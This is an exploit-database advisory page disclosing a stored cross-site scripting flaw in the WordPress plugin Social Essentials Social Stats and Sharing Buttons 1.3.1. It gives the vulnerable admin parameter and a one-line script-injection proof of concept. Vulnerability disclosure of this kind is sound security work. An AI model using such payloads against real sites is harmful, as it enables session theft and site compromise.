[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS Vulnerability

Author
Madhu Akula
Risk
[
Security Risk Low
]
0day-ID
0day-ID-24752
Category
web applications
Date add
18-12-2015
Platform
php
WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS Vulnerability

Plugin Name : Social Essentials Social Stats and Sharing Buttons
 
Effected Version : 1.3.1 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following field put the payload as below
 
http://localhost/wp-admin/admin.php?page=social-essentils-setup
se_settings_twitter_username = “><script>alert(1)</script>
 
Vulnerable Parameter : se_settings_twitter_username
 
Type of XSS : Stored

#  0day.today [2024-12-25]  #